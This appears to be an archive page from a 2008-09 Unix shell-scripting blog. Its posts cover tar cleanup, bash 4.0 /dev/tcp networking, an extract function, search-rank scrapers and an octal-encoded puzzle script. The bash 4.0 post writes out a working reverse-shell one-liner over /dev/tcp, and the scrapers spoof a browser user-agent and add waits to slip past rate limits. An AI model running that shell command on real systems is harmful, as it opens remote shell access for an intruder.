Which is the escape key again (to get you into vi command mode) and the "k" key twice to move you up two lines in your history (which goes from newest to oldest from bottom to top), the x key (to delete the # (pound) character)) and then the enter key to have the shell execute your command line :) Yay! One down; one to go. Unfortunately, this won't work for shells that don't support line editing (like the bourne shell, as opposed to most Linux sh's which are usually just bash or dash)

2. How to clean up a huge mess when you untar a file that doesn't contain its own subdirectory. For instance, if you have this in your directory:

host # ls
file1.tar a b c d


and you untar file1.tar (which meets the above conditions), you might end up with this:

host # tar xpf file1.tar
file1.tar ab a bb b cb c db d x y z


and some of those new files might be directories with files in them, etc. This situation shouldn't be too bad, since you have very little in your directory. But sometimes, if you do it in /usr/local/bin (and, to add some more stress, can't rely on the file dates) this can create a very confusing situation. What do you get rid of without destroying everything?

There are a number of ways to get around this issue, but this one seems the fastest, with the least amount of hassle (feel free to combine the steps when you do this yourself; we're just keeping them apart for illustrative purposes):

To see what you've untarred (probably not necessary, but worth it if you happen to eyeball an important file you accidentally overwrote - another issue entirely ;)

host # tar tpf file.tar
ab
bb
bb/a
cb/c/d
cb/c
db
x/y/z.txt
y/x
z


Now, you know what was in your original tar file and, therefore, what you should be deleting :) It's very simple to do, but we'd recommend you run this command once, like this:

host # echo $(ls -1d `tar tpf bob.tar`)

just to be sure, and (if that looks good) remove the tar file contents and then do whatever you want with the tar file (like extract it to another directory):

host # rm $(ls -1d `tar tpf bob.tar`)

Also, if your shell doesn't support the $() expansion operators, you can always backtick your internal backticks like so: (or do something even more clever - there are probably more than a few ways to skin this cat ;)

host # rm `ls -1d \`tar tpf bob.tar\``

We'll see you tomorrow for the reading experiment. SPOILER ALERT: It's not what you think it is, unless you think it's what it is ;)

Cheers,

, Mike




Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!



Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Thursday, February 12, 2009

When Features Attack: Bash Version 4.0.0(1)-rc1

How do?,

Before we get started today, I just wanted to reflect on our posts' introductions. Usually it's "Hey there," or something to that effect. Being one of those people who are bothered by redundancy (at least, after the 50th time ;) this is the one part of blog posting I find the most grating. And, since everything reminds me of a George Carlin quote, I think he put it pretty well in this little paragraph about saying goodbye to your fellow man (from "Napalm And Silly Putty"):

Then have you noticed this, you get in a rut with the way you say goodbye. You ever find yourself using the same phrase over and over again with everybody, you feel a little stupid. Like if you're leavin' a party, and you have to say goodbye to five people, you say, "OK, hey take it easy, OK, hey take it easy, OK, hey take it easy..", you feel like a goddamn moron, ya know? So you know what I do? Every month, I change the way I say goodbye. Whether I need to or not, every month I start using a different phrase. People notice that. They appreciate that extra effort. They'll say to me, "Pardon me, didn't you used to say, 'OK, hey take it easy'". I say, "Yes I did. but not anymore." Now I say "Farewell". Farewell 'til we meet again, Peace be with you. May the forces of evil become confused on the way to your house. That's a strong one, isn't it? People will remember you if you talk like that. Then sometimes you can combine certain ways to say goodbye that don't really seem to go together, like, "Toodle-oo, go with God, and don't take any wooden nickels." Then people don't know what the fuck you're talking about! Or you can say goodbye in a realistic manner. "So long Steve, don't let self-doubt interfere with plans to improve your life." Well, some people need practical advice.


Anyway, that being said, my options are somewhat limited, since I'm old enough to feel silly saying (or writing) things like "Word," or "What's the haps?" The first one is slang that just doesn't belong to my generation. I might find it amusing, but, at the same time, it seems like it might be confusing or taken the wrong way. The second one seems to have come around within the last year or so and, despite its down-home flavour and growing presence, I've yet to meet anyone who's actually ever said it and, to be quite honest, whenever I read that greeting in an email I mentally envision a middle-aged white man tragically out of touch with the youth culture of today and, also tragically, clamoring out in a weak last-ditch effort to stay hip. I pretty much understand everything most kids say to each other, but I've never felt the need to incorporate any of it into my own dialogue. The only exception is if I'm being sarcastic, which the kids pick up on immediately. They're not stupid and they can smell desperation. I would imagine that they (as I did when I was younger) look to the adults among them for some sense of normalcy, even in the form of language. As a parent, I don't discourage my kids from "fitting in," but I do try to provide a point of reference for them so they can go out into the world and speak intelligently to the older people that will be signing their paychecks (unless they're paying themselves, in which case they're either incredibly successful or possibly schizophrenic ;) Anyway, that being said (damn it! ...redundancy again ;), let's get on with this post. I'm getting farther and farther off-topic. It's a good thing I'm not getting paid for this ;)

On-topic (although this post is much less interesting than the Fox special where the latest build of bash mauls one of its handlers on film ;) I finally found some time and compiled version 4.0.0(1)-rc1 which, I believe, is the latest release out there right now (I could very well be wrong, as I completely missed 4.0-beta2). One of the first things I noticed when looking at the configurable options is that the ability to access the network via Bash's /dev/tcp networking functionality is now an actual option ( --enable-net-redirections ) to configure. When I saw this, I thought two things:

1. Although this used to be enabled by default (which sparked some controversy) , now you have to specifically add it when you build. Of course, conversely, you can specifically exclude it, as before, which leads to the next point...

2. With regards to disabling the net redirection feature, I'm curious if it's a more secure implementation or if it's just being "recognized." Part of me figures that security issues will probably continue to exist with this feature, or it wouldn't be disabled by default. This way, anyone who wants to compile on their own, isn't aware of any of the security risks, and just does a robotic-build (./configure;make;make install - or, and I can't be certain of this, installs the default-build rpm, dpkg, pkg, etc) won't be vulnerable. I've seen a lot of debate on the blogs and boards about whether or not bash's implementation of net redirects is, in fact, a real security risk. For instance, labs.neohapsis.com has this nice online tutorial on how to connect back to the shell using bash net redirects. If you don't want to hop over there, I tested this with net redirects built into bash 4.0.0(1)-rc1 and it still works:

host # exec /usr/local/bin/bash 0</dev/tcp/host/514 1>&0 2>&0

HAPPY NOTE: If you're stuck with any bash version (or pre-compiled OS package), you can still - for the most part - disable bash's net redirect functionality (except in the case of the root user and/or anyone with equal system privilege) in, probably, more than one way. Check out our old post on securing /dev/tcp and /dev/udp if your OS allows you to set extended file access control lists. Restricting the permissions on /dev/tcp and /dev/udp to that extent doesn't actually remedy the underlying situation, but it does make it a lot harder to exploit.

I've included a combo-script (built from various older ones we've posted before) so that you can test your system/OS's behaviour when implementing this functionality with the latest version of bash. I'll probably be goofing around with this a lot in the near future ( although I promise not to bother you with every boring detail ;), as it could make some of our older bash scripts much tighter and outside-software-independent if it proves out.

Farewell 'til we meet again, Peace be with you. May the forces of evil become confused on the way to your house ;)

P.S. In the pictured output below, I used "www.tinyurl.com" for the httpserver variable so it would get the 301 redirect and you'd be able to see all the output from the script. If you run this script against "tinyurl.com" you'll get back the entire page, which runs a bit long)

Click on the picture below for the fun-sized version ;)

Output from bash net redirect script

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash
#
# httpg11
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

#
# Just edit these to your preferences -
# $domain should just be the domain.com part of your $mailserver address
#

mailserver="mail.domain.com"
domain="domain.com"
httpserver="www.tinyurl.com"

echo "Testing mail server functionality"
exec 9<>/dev/tcp/$mailserver/25
read -r server_version <&9
echo "Server reports it is: $server_version"
echo "HELO $domain" >&9
read -r greeting <&9
echo "Server responded to our hello with: $greeting"
echo "VRFY username" >&9
read -r vrfy_ok <&9
echo "Server indicates that this is how it feels about the VRFY command: $vrfy_ok"
echo "quit" >&9
read -r salutation <&9
echo "Server signed off with: $salutation"
echo "Dumping any remaining data in the file descriptor"
cat <&9 2>&1
echo "Closing input and output channels for the file descriptor"
9>&-
9<&-
echo "--------------------------------------------------"
echo "Testing web server functionality - Here it comes..."
exec 9<>/dev/tcp/$httpserver/80
echo "GET / HTTP/1.1" >&9
echo "Host: $httpserver" >&9
echo "Connection: close" >&9
echo "" >&9
while read line
do
echo "$line"
done <&9
echo "Dumping any remaining data in the file descriptor"
cat <&9 2>&1
echo "Closing input and output channels for the file descriptor"
9>&-
9<&-
echo "done"


, Mike




Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!



Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Monday, January 19, 2009

Extracting Different File Types On Linux And Unix - Guest Post

Hey there, everyone, hope you had a pleasant weekend :)

Today's Unix/Linux post is courtesy of TuxHelper and deals with the extraction of various types of compressed files in the bash shell. More specifically, it deals with setting up a very clever function that you can include in your .bashrc.

This little function is brilliant, in that it's so simple, obvious, and convenient that I can't believe I never thought to do it myself (I must be a glutton for punishment ;)

Hope you enjoy it and can "extract" some value from it (I really had to "push" that one ;)

Cheers, (and if anyone else out there would like to submit content and help me stave off that impending nervous collapse, please feel free to send me a comment :)





Thanks to "plb" on the debian forum for providing the tip/trick!

Open your .bashrc file located in your /home/$USER/ directory. It is a hidden file as some like to call it in the Gnu/Linux world. Assuming you have opened your file find a spot to paste in the following text:


function extract()
{
if [ -f "$1" ] ; then
case "$1" in
*.tar.bz2) tar xjf "$1" ;;
*.tar.gz) tar xzf "$1" ;;
*.tar.Z) tar xzf "$1" ;;
*.bz2) bunzip2 "$1" ;;
*.rar) unrar x "$1" ;;
*.gz) gunzip "$1" ;;
*.jar) unzip "$1" ;;
*.tar) tar xf "$1" ;;
*.tbz2) tar xjf "$1" ;;
*.tgz) tar xzf "$1" ;;
*.zip) unzip "$1" ;;
*.Z) uncompress "$1" ;;
*) echo "'$1' cannot be extracted." ;;
esac
else
echo "'$1' is not a file."
fi
}


Now go to your editor/notepad menu and save. The next time you have an archived file that need to be opened open a terminal/console and type: (example): extract myfile.zip!





, Mike



Yannis Tsopokis had this to add - Turns out this is all a lot easier than I ever thought. I'm officially a dinosaur ;)


For Linux there is unp which chooses which utility will extract the file and calls it.

Yannis

A huge supporter of the Rox Desktop had this to add - perhaps now, the correct source will get proper attribution!


This is actually from http://roscidus.com/desktop/Archive

tgz = Extract('tgz', "gunzip -c - | tar xf -")
tbz = Extract('tar.bz2', "bunzip2 -c - | tar xf -")
tarz = Extract('tar.Z', "uncompress -c - | tar xf -")
rar = Extract('rar', "unrar x '%s'")
ace = Extract('ace', "unace x '%s'")
tar = Extract('tar', "tar xf -")
rpm = Extract('rpm', "rpm2cpio - | cpio -id --quiet")
cpio = Extract('cpio', "cpio -id --quiet")
deb = Extract('deb', "ar x '%s'")
zip = Extract('zip', "unzip -q '%s'")
jar = Extract('jar', "unzip -q '%s'")

Justin Li noted this very important point! Thanks for contributing, Justin!


Hi Mike,

I have been a follower of the Menagerie for a while; your posts have taught me quite useful things. For the extract script though, wouldn't it be better if the script used file to find the filetype instead of matching against the file name? Especially since in Linux the file extension is only a convention for humans, the output of file would be much more accurate.

Keep writing about Linux!

Justin


Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!



Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Thursday, January 15, 2009

Bash script to find all of your indexed web pages on Google

Hey there,

Today's Linux and/or Unix bash script is a kind-of add-on for our original bash script to find your Google search index rank from last August (2008 - for those of you who might be reading this in some barren wasteland in a post-apocalyptic future where, for some inexplicable reason, my blog posts are still legible and being transmitted over the airwaves ...or delivered in paper format by renegade-postman Kevin Costner ;)

While the original script would search Google for any link to the URL you specified, based on a search of any number of keywords, or keyword phrases, you supplied (up to 1000 results, when Google cuts off), this one checks to see if your site is indexed by Google, and how heavily. I know that sounds like almost the exact same thing, but it's slightly different, I promise :)

This version (named "gxrank" since the original script was named "grank," I needed to differentiate between the two in my bin directory and - I'll admit - I wasted not one ounce of imagination on the title ;) will accept a URL you supply and check Google's index for your site. It will then let you know how many pages, and which ones, are in Google's index.

While this might not seem like a valuable script to have, I use it a lot to test how fast I can put sites up for people and get them indexed. For instance, I might put up a site today and do all the standard SEO falderal. Of course, I won't run this script that night, but, usually by the next day, I'll be able to run this script and, at least, get back 1 result for the base URL. Then, over time, I can run this script (usually once per day, so I can feel impressed ;) and see how many pages on my site have been indexed. This script was, most specifically, made to track high-activity blogs (at least a post a day), but I use it for smaller sites, as well. If I put a site up that has 10 pages, it's nice to know when (or should I say if? ;) those 10 pages get fully indexed.

The usage for the script is fairly simple. You can run it from the Linux or Unix command line like:

host # ./gxrank yourUrl.com

You don't need to include the http:// or any other stuff. It's basically a regular expression match, so you can just include enough of a semi-URL to make sure you get back relevant results. You'll notice that I also only have it printing out the first 100 results maximum (you can modify this so it doesn't show you anything, if you want - I just like to see it. Google gives strange results when the amount of returns is less than the amount of maximum results on any given page. Like, it might list 38 index entries and then say that it got that many out of approximately 57 results. They're probably removing similar results but, ultimately, the exact number of index entries isn't all that important since it fluctuates often)

As a "for instance," below is the output of the script when run to check the indexed pages of gotmilk.com (Not for any particular reason; they were just the first site I ran across that didn't return more results than would fit on my screen ;)

Note: Click on the image below to "virtually experience" the bends ;)

gotmilk.com indexed pages on Google

Hope you enjoy this script and get some good use out of it. Sometimes just seeing your numbers grow can pick you up when you're ready to throw in the towel on your website :)

Cheers,

IMPORTANT NOTE: Although this warning is on the original Google search rank index page, it bears repeating here and now. If you use wget (as we are in this script), or any CLI web-browsing/webpage-grabbing software, and want to fake the User-Agent, please be careful. Please check this online article regarding the likelihood that you may be sued if you masquerade as Mozilla.


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# gxrank - how many pages does Google have in its index for you?
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

if [ $# -ne 1 ]
then
echo "Usage: $0 URL"
echo "URL with or with http(s)://, ftp://, etc"
exit 1
fi

url=$1
shift

base=0
start=0
not_found=0
search_string="site:$url"

echo "Searching For Google Indexed Pages For $url..."
echo

num_results=`wget -q --user-agent=Firefox -O - http://www.google.com/search?q=$search_string\&hl=en\&safe=off\&pwst=1\&start=$start\&sa=N|awk '{ if ( $0 ~ /of about <b>.*<\/b> from/ ) print $0 }'|awk -F"of about" '{print $2}'|awk -F"<b>" '{print $2}'|awk -F"</b>" '{print $1}'`

while :;
do
if [ $not_found -eq 1 ]
then
break
fi
wget -q --user-agent=Firefox -O - http://www.google.com/search?q=$search_string\&num=100\&hl=en\&safe=off\&pwst=1\&start=$start\&sa=N|sed 's/<a href=\"\([^\"]*\)\" class=l>/\n\1\n/g'|awk -v num=$num -v base=$base '{ if ( $1 ~ /^http/ ) print base,num++,$NF }'|awk '{ if ( $2 < 10 ) print "Google Index Number " $1 "0" $2 " For Page: " $3; else if ( $2 == 100 ) print "Google Index Number " $1+1 "00 For Page: " $3;else print "Google Index Number " $1 $2 " For Page: " $3 }'|grep -i $url
if [ $? -ne 0 ]
then
not_found=1
if [ $not_found -eq 1 ]
then
break
fi
else
break
fi

done

if [ $not_found -eq 1 ]
then
echo "Finished Searching Google Index"
echo
fi

echo "Out Of Approximately $num_results Results"
echo
exit 0


, Mike




Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!



Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Monday, December 29, 2008

Finding Your Yahoo Search Index Rank From The Unix Or Linux CLI

Hey There,

Today we're going to continue in our ongoing quest to rank highly in search engine results while simultaneously messing with them a lot ;) Previously, we've put out scripts to find your MSN search index rank from the CLI and to find your Google search index rank from the CLI. This is, of course, another script that, although it fits in the same category as the other two, is distinctive in several ways:

1. This time we're scouring Yahoo's search results.

2. The search results are being parsed differently, so that it makes it easier for the script to detect the point at which Yahoo cuts you off and won't let you do another search for a good 10 or 15 minutes.

3. The parsing code has been minimized, somewhat, so that it may actually be readable by humans who aren't pipe-chain-sed-awk-regular-expression fanatics ;)

4. See the continuation below for a very interesting analysis of Yahoo's robot-tolerance.

BUT FIRST, THIS VERY IMPORTANT NOTE: If you use wget (as we are in this script), or any CLI web-browsing/webpage-grabbing software, and want to fake the User-Agent, please be careful. Please check this online article regarding the likelihood that you may be sued if you masquerade as Mozilla, from the folks who maintain wget themselves.

This Yahoo script, of course, is only slightly different than the original Google and MSN scripts, although the differences are significant enough that most of the core was rewritten completely. The script, itself, operates the same way our Google and MSN search index page rank scripts do, insofar as executing it from the command line goes. There are, at least, three different ways you can call it. The most basic being:

host # ./yrank www.yourdomain.com all these key words

It doesn't matter if they're enclosed in double quotes or not. If you "really" want to get the double quote experience, you just need to backslash your double quotes.

host # ./yrank www.yourdomain.com \"all these key words\"

Other ways include creating files with the URL and keyword information (same format as the command line) and feeding them to the script's STDIN:

host # cat FILE|./mrank
host # ./mrank <FILE


Point 4 (continued from above): Yahoo robot search tolerance as compared with Google. This is actually quite interesting since, I believe, the general assumption is that Google is far less tolerant of seemingly-human interaction with its search than Yahoo is. However, in this case (and we've repeated this experiment over and over again) the opposite is, in fact, true. Check it out! :)

The setup is that we've created a simple file called "searchterms" to feed to both the grank and yrank scripts. It contains the following information:

host # cat searchterms
linuxshellaccount.blogspot.com unix linux
linuxshellaccount.blogspot.com linux unix
linuxshellaccount.blogspot.com unix and linux
linuxshellaccount.blogspot.com linux and unix
linuxshellaccount.blogspot.com unix
linuxshellaccount.blogspot.com linux
linuxshellaccount.blogspot.com perl script
linuxshellaccount.blogspot.com shell script


Then, we put each search engine to the test. Each grabbing results at 100 per page. You'll notice that the Google search engine makes it through the entire bunch without kicking us to the curb ;)

The image below was captured with a rear-view mirror and is, therefore, actually larger than it appears. Click below to see it in "life size" ;)

Google Robot Tolerance Test

And here is the exact same experiment; this time run against Yahoo's search engine. It ...just ...barely ...nope. It doesn't make it, again ;)

This image was taken in "Wallflower-Vision" - sometimes referred to as the "Shrinking-Violet Protocol." To see it in its natural, and unabashedly large, state, just click on it below and it will almost definitely come out of its corner ;)

Yahoo Robot Tolerance Test

Our initial suggestion is to change this line in the script (decreasing the number that you divide RANDOM by will increase the maximum wait time between tries):

let random=${RANDOM}/600


The value of 600 roughly approximates between 0 and 60 seconds of wait time. Reducing that number to 300 will roughly approximate wait times between 0 and 120 seconds, etc. The numbers generated by bash's RANDOM variable may vary depending upon your OS, system architecture, etc.

Another possibility, which we didn't have time to fully test (so it's not included in the script) is that Yahoo may actually object to the direct manipulation of the GET request and would probably respond more favorably if we extracted the URL value for our next successive request from the "Next" button on the search page, rather than moving on to the next valid (although coldly calculated) GET string to bring up the next set of 100 results. Time will tell. Experimentation is ongoing.

Hope you enjoy it, again, and you're still enjoying the holiday's. Even if none of them apply to your religious or moral belief-system, at least you get some paid time off of work :)

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# yrank - Get yer Yahoo's Out ;)
#
# 2008 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

if [ $# -lt 2 -a $# -ne 0 ]
then
echo "Usage: $0 URL Search_Term(s)"
echo "URL with or with http(s)://, ftp://, etc"
echo "Double Quote Search If More Than 1 Term"
exit 1
fi

if [ $# -eq 0 ]
then
while read x y
do
url=$x
search=$y
$0 $x "$y"
done
exit 0
else
url=$1
shift
search=$@
fi

search_terms=`echo $search|sed 's/ /+/g'`
start=1
count=1

echo "Searching for URL $url with search terms: $search"

results=`wget -O - http://search.yahoo.com/search?p=${search_terms}\&ei=UTF-8\&fr=yfp-t-501\&pstart=1\&b=$start 2>/dev/null|sed -n 2p 2>&1|sed 's/^.* of \([0-9,]*\) for .*$/\1/'`

while [ $start -lt 1001 ]
do
wget -O - http://search.yahoo.com/search?p=${search_terms}\&ei=UTF-8\&fr=yfp-t-501\&pstart=1\&b=$start\&n=100 2>&1|grep "error 999" >/dev/null 2>&1
screwed=$?
if [ $screwed -eq 0 ]
then
echo
echo "You have been temporarily barred due to excessive queries."
echo "Please change the \"random\" variable in this script to a"
echo "lower value, to increase wait time between queries, or take"
echo " 5 or 10 minutes before you run this script again!"
echo
exit 1
fi
wget -O - http://search.yahoo.com/search?p=${search_terms}\&ei=UTF-8\&fr=yfp-t-501\&pstart=1\&b=$start\&n=100 2>/dev/null|sed -n 2p 2>&1|sed 's/^.* of [0-9,]* for //'|sed 's/<[^>]*href="\([^"]*\)"[^>]*>/\n\1\n/g'|sed -e :a -e 's/<[^>]*>//g;/</N;//ba'|grep "^http"|sed '/^http[s]*:\/\/[^\.]*\.*[^\.]*\.yahoo.com/d'|sed '/cache?ei/d'|uniq|while read line
do
echo "$line"|grep $url >/dev/null 2>&1
yes=$?
if [ $yes -eq 0 ]
then
echo "Result $count of approximately " $results " results for URL:"
echo "$line"
exit 1
else
let count=$count+1
fi
done
end=$?
if [ $end -eq 1 ]
then
exit 0
else
let start=$start+100
let count=$count+100
let new_limit=$start-1
let random=${RANDOM}/600
echo "Not in first $new_limit results"
echo "waiting $random seconds..."
sleep $random
fi
done


, Mike




Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Tuesday, December 23, 2008

We'll Be Moving Soon: Unix and Linux Lame Encryption Decoded

Hey there,

There are still several hours left to go on the poll (which may be closed at the time of publishing) as I write this post, but (unless something insane happens) it looks as though our desire to remove ourselves from blogspot agrees with the opinion of about 77 percent of the folks who took the time to vote. I won't go through all the reasons things will be better once we get our own URL, although I will provide a handy link back to the original post where we laid out our reasons for moving on to our own host. Once things get ironed out (which should be well before we actually "do" move), the switch will be made. Hopefully, we'll be able to either maintain both sites at once or Google will be good enough to allow us to keep this domain and redirect from it for a while (for free or for a fee; however they do it).

NOTE: If you're one of the potentially thousands of people who stop by here every once in a while (and you haven't written in yet), we'll be putting up a limited subscription email form (you can always email us via the "Send Me A Comment" link at the top right of every page) as soon as possible. To be 100 percent clear, the "limited" part means that it won't be up forever AND that the subscription (as is so often referenced on many white/black/grey-hat marketing sites on the net) is "limited" in that you'll get one email (announcing our new address, and any other information pertinent to the move), after which you will be automatically unsubscribed. This is a one-shot email deal and your email address will not be sold or traded in any way. You always have the option of just following the site, as we should be posting information about the move, as we get it, right here. We probably have something to gain by collecting a bunch of email addresses, but if we ever want to sell you something, we'll let you know that we're trying to sell you something. Wanna buy a bridge? ;)

More on that, as it comes. It appears as though we have some work to do over the holidays. In the end, this move should result in a better experience for both the reader and everyone here, since we'll be able to avail ourselves of conveniences not possible under our current setup. We thank Google for helping us get our start for zero dollars per month, but now it's time for us to move on.

And, to wrap up, since nobody replied regarding our previous confusion and lame encryption treasure-hunt post, we got lucky and don't have to pony-up the prize right away ;) Although, rest assured, on our new site, there will be revision upon revision of our cable TV script, in real-time, as we're able to update it in our CVS repository. We have a personal stake in seeing this through because, after having it work so well for a month, many of us have become entirely dependant on it. Zap2it may have changed their format (and will probably do so again), but we can modify how we extract the information. Also, TVGuide would be a good alternate source of information for getting instant television listings.

BTW, the original script was our Google search index rank script, compressed and goofed around with (although not made unworkable) via methods posted in our series on security through obfuscation and, finally, made even more confusing using our script to do lame encryption using od. Check it out. Why would we lie ;)

In closing, we're looking forward to the move and will put up a mail form as soon as possible. If you prefer, again, just send us email via the "Send Me A Comment" link at the top right of every post if you wish to be notified when the terms of the move are finalized, or you just have a gripe ;)

Cheers :)

, Mike




Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Friday, December 19, 2008

Confusion And Lame Encryption On Linux And Unix

Hey there,

Today, since the holidays are bringing me so much joy (heavy, heavy sarcasm ;), I thought it would be fun to write a post that makes use of some of the principles we've posted on this blog over the past year and combine them to create a treasure hunt of sorts. Actually, a lot of my holiday posts are going to be a little experimental. Since readership goes way down during the holiday season, it's a great time to write less conservative posts. Who knows what I'll be able to get away with? Not me; but I can't wait to find out :)

This isn't an ordinary treasure hunt, of course. No buried treasure or, really, anything of value at the end (Sometimes, I think I missed my calling in life when I passed on being a motivational speaker ;). Not much more than the pride in the knowledge that you figured it out and/or the passive-aggressive loathing you'll feel as you obsess over how I'm not so clever as I think, after all (although, hate me in moderation. You don't want to forget to stick another pin in my effigy before you burn it). This is quickly turning into a very dark post ;)

Of course, I, like most people I know who are around my age and have families of their own, dread the holidays. I love the fact that my kids are having fun, but the women (no offense, ladies...) in my family take this whole shebang way too seriously and the long hard journey to the day after the day after Christmas almost always includes at least one emotional breakdown, semi-psychotic episode or in-fighting about who did what better than whom and enlightening conversations that begin with "can you believe what he/she ...blah, blah, blah." I think if we all just got back to the commercialism that the holidays are really all about, everything would be perfectly fine and we'd all be happy again.

Here's a good tip, that I've found always serves the user well: Whenever I start to feel like I'm going to kill a relative during the peak of the festivities, I think to myself: What would Jesus do? I pause, reflect and then just figure "screw it" and try to get on with my life ;)

Anyway, before I lift your spirits up too high, here's what I've got for you today (hint: the next few lines are laden with clues. All that stuff above was crazy talk. And, if you're a family member of mine, of course I didn't mean a word of it ;) The jumble of numbers that looks like an octal dump was encrypted using a perl script that we posted to this blog some time ago. Of course the encrypted bash script has had it's name and attribution removed so those of you who can read octal won't get off easy ;) The script itself is all mashed together using a security method we've practiced in a few posts on this blog which makes scripts less likely to be mucked with by compressing them and, essentially, making them really long one-liners.

If you figure out what the script is and can email me the name (which is listed in the post that the obfuscated and lame-encrypted script originally came from; in the script headers - plain as day), I'll rewrite cabletv.sh for you, since zap2it changed their output format a month after our reader base (and this is impressive, I think) began apparently kicking the cr## out of them 24x7 (on top of the massive count of regular folk who used it through a web browser, as it was intended to be viewed). My apologies to zap2it, of course. Hopefully, they're not too upset. Really, I'd be ecstatic if I could get a Google PR of 7 and an Alexa Rank of 2,977 with 253,590 backlinks (I'm just guesstimating ;).

My time and effort is about the only thing I can afford to give this Christmas. All the money's going toward buying the kids' presents, because I want them to remember their childhood fondly (which gives me panic attacks ;) and not as a time of recession, conservation and perceived punishment for some huge corporation's massive screw-ups. Hopefully, my sheltering doesn't end up producing intolerable adults who'll scorn my existence later in life and/or try to have me declared incompetent so they can take control over my pocket change ;)

Happy Holidays to you all and enjoy the hunt :)

P.S. Check this post for a halfway decent way to download this code without having to manually convert it back from a single line! Look for the step-by-step method I use, when I can't get to the admin interface of this blog, in section 2.

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

043 041 057 142 151 156 057 142 141 163 150 012 012 151 146 040
133 040 044 043 040 055 154 164 040 062 040 055 141 040 044 043
040 055 156 145 040 060 040 135 073 164 150 145 156 040 145 143
150 157 040 042 125 163 141 147 145 072 040 044 060 040 125 122
114 040 123 145 141 162 143 150 137 124 145 162 155 050 163 051
042 073 145 143 150 157 040 042 125 122 114 040 167 151 164 150
040 157 162 040 167 151 164 150 040 150 164 164 160 050 163 051
072 057 057 054 040 146 164 160 072 057 057 054 040 145 164 143
042 073 145 170 151 164 040 061 073 146 151 073 151 146 040 133
040 044 043 040 055 145 161 040 060 040 135 073 164 150 145 156
040 167 150 151 154 145 040 162 145 141 144 040 170 040 171 073
144 157 040 165 162 154 075 044 170 073 040 163 145 141 162 143
150 137 164 145 162 155 163 075 044 171 073 040 044 060 040 044
170 040 042 044 171 042 073 144 157 156 145 073 145 170 151 164
040 060 073 145 154 163 145 040 165 162 154 075 044 061 073 163
150 151 146 164 073 163 145 141 162 143 150 137 164 145 162 155
163 075 044 100 073 146 151 073 142 141 163 145 075 060 073 156
165 155 075 061 073 163 164 141 162 164 075 060 073 155 165 154
164 151 160 154 145 137 163 145 141 162 143 150 075 060 073 156
157 164 137 146 157 165 156 144 075 060 073 146 157 162 040 170
040 151 156 040 044 163 145 141 162 143 150 137 164 145 162 155
163 073 144 157 040 151 146 040 133 040 044 155 165 154 164 151
160 154 145 137 163 145 141 162 143 150 040 055 145 161 040 060
040 135 073 164 150 145 156 040 163 145 141 162 143 150 137 163
164 162 151 156 147 075 044 170 073 155 165 154 164 151 160 154
145 137 163 145 141 162 143 150 075 061 073 145 154 163 145 040
163 145 141 162 143 150 137 163 164 162 151 156 147 075 042 044
173 163 145 141 162 143 150 137 163 164 162 151 156 147 175 053
044 170 042 073 146 151 073 144 157 156 145 073 145 143 150 157
040 042 123 145 141 162 143 150 151 156 147 040 106 157 162 040
107 157 157 147 154 145 040 111 156 144 145 170 040 106 157 162
040 044 165 162 154 040 127 151 164 150 040 123 145 141 162 143
150 040 124 145 162 155 163 072 040 044 163 145 141 162 143 150
137 164 145 162 155 163 056 056 056 042 073 145 143 150 157 073
156 165 155 137 162 145 163 165 154 164 163 075 140 167 147 145
164 040 055 161 040 055 055 165 163 145 162 055 141 147 145 156
164 075 106 151 162 145 146 157 170 040 055 117 040 055 040 150
164 164 160 072 057 057 167 167 167 056 147 157 157 147 154 145
056 143 157 155 057 163 145 141 162 143 150 077 161 075 044 163
145 141 162 143 150 137 163 164 162 151 156 147 134 046 150 154
075 145 156 134 046 163 141 146 145 075 157 146 146 134 046 160
167 163 164 075 061 134 046 163 164 141 162 164 075 044 163 164
141 162 164 134 046 163 141 075 116 174 141 167 153 040 047 173
040 151 146 040 050 040 044 060 040 176 040 057 157 146 040 141
142 157 165 164 040 074 142 076 056 052 074 134 057 142 076 040
146 157 162 057 040 051 040 160 162 151 156 164 040 044 060 040
175 047 174 141 167 153 040 055 106 042 157 146 040 141 142 157
165 164 042 040 047 173 160 162 151 156 164 040 044 062 175 047
174 141 167 153 040 055 106 042 074 142 076 042 040 047 173 160
162 151 156 164 040 044 062 175 047 174 141 167 153 040 055 106
042 074 057 142 076 042 040 047 173 160 162 151 156 164 040 044
061 175 047 140 073 167 150 151 154 145 040 072 073 144 157 040
151 146 040 133 040 044 156 157 164 137 146 157 165 156 144 040
055 145 161 040 061 040 135 073 164 150 145 156 040 142 162 145
141 153 073 146 151 073 167 147 145 164 040 055 161 040 055 055
165 163 145 162 055 141 147 145 156 164 075 106 151 162 145 146
157 170 040 055 117 040 055 040 150 164 164 160 072 057 057 167
167 167 056 147 157 157 147 154 145 056 143 157 155 057 163 145
141 162 143 150 077 161 075 044 163 145 141 162 143 150 137 163
164 162 151 156 147 134 046 156 165 155 075 061 060 060 134 046
150 154 075 145 156 134 046 163 141 146 145 075 157 146 146 134
046 160 167 163 164 075 061 134 046 163 164 141 162 164 075 044
163 164 141 162 164 134 046 163 141 075 116 174 163 145 144 040
047 163 057 074 141 040 150 162 145 146 075 134 042 134 050 133
136 134 042 135 052 134 051 134 042 040 143 154 141 163 163 075
154 076 057 134 156 134 061 134 156 057 147 047 174 141 167 153
